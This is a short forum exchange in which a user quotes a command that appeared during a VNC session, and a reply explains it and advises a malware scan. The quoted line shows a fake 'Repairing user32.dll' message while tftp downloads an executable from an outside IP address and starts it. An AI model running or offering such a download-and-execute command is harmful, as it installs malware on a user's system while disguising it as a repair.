hi
when i was browsing the internet and running VNC, suddenly, the Task Manager opned and Command Prompt was running along with the following command:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 68.213.254.139 GET ogtcwaao.exe & start ogtcwaao&

what does it mean?

The IP address is Terdos.com in Miami.
The message was the contents of a batch file which downloaded ogtcwaao.exe and ran it. I am not familiar with the filename but it could easily have been a trojan, or something similar. You should run a virus check and malware check.
